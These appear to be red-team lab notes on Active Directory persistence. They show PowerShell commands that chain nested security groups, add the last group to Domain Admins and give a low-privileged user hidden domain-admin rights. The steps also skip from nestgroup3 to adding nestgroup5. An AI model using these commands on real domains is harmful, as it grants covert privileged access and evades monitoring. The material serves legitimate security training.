==This technique is incredibly invasive and hard to remove. Even if you have signoff on your red team exercise to perform these techniques, you must take the utmost caution when performing these techniques. In real-world scenarios, the exploitation of most of these techniques would result in a full domain rebuild.==
General
In Active Directory (AD), nested groups refer to the practice of placing one group inside another group, also known as a "parent-child" relationship. This allows for more efficient management of user access to resources and easier delegation of administrative tasks.
Nested groups can be used to hide oneself in domain admin groups by creating a new group, adding oneself to that group, and then adding that group to the domain admin group. By doing this, an attacker can gain access to resources that are restricted to domain admin without being directly a member of the domain admin group, and therefore can evade detection.
For example, an attacker can create a new group called "Delegated Admins" and add their own user account to it. Then the attacker can add the "Delegated Admins" group as a member of the "Domain Admins" group. Now the attacker's user account has the same privileges as a member of the "Domain Admins" group, but it's not directly a member of it, and it's harder to detect.
Nested Groups
In many organizations, there are a large number of groups that are members of other groups, known as recursive groups or group nesting. This is used to create a more organized structure in Active Directory (AD). However, this structure also reduces visibility into effective access, making it difficult to understand who has access to what. Additionally, it can make it harder to monitor for changes to privileged groups, as changes to subgroups may not trigger alerts. As an attacker, this can be leveraged to maintain persistence by targeting subgroups that are not being monitored, rather than privileged groups that would raise alerts.
Commands
Nesting Our Persistence
- Change all the groupe name as desired (Net group, GROUP_NAME,...)
Let's simulate this type of persistence. In order to simulate the persistence, we will create some of our own groups. Let's start by creating a new base group that we will hide in the People->IT Organisational Unit (OU)
PS C:\Users\Administrator.ZA>New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 1" -SamAccountName "GROUPE_NAME_nestgroup1" -DisplayName "GROUPE_NAME Nest Group 1" -GroupScope Global -GroupCategory Security
Let's now create another group in the People->Sales OU and add our previous group as a member:
PS C:\Users\Administrator.ZA>New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 2" -SamAccountName "GROUPE_NAME_nestgroup2" -DisplayName "GROUPE_NAME Nest Group 2" -GroupScope Global -GroupCategory Security
PS C:\Users\Administrator.ZA>Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup2" -Members "GROUPE_NAME_nestgroup1"
We can do this a couple more times, every time adding the previous group as a member
PS C:\Users\Administrator.ZA> New-ADGroup -Path "OU=CONSULTING,OU=PEOPLE,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 3" -SamAccountName "GROUPE_NAME_nestgroup3" -DisplayName "GROUPE_NAME Nest Group 3" -GroupScope Global -GroupCategory Security
PS C:\Users\Administrator.ZA> Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup3" -Members "GROUPE_NAME_nestgroup2"
With the last group, let's now add that group to the Domain Admins group
PS C:\Users\Administrator.ZA>Add-ADGroupMember -Identity "Domain Admins" -Members "GROUPE_NAME_nestgroup5"
Add our low-privileged AD user to the first group we created
PS C:\Users\Administrator.ZA>Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup1" -Members "<low privileged username>"
Low-privileged user should now have privileged access to DC
dir \\thmdc.za.tryhackme.loc\c$\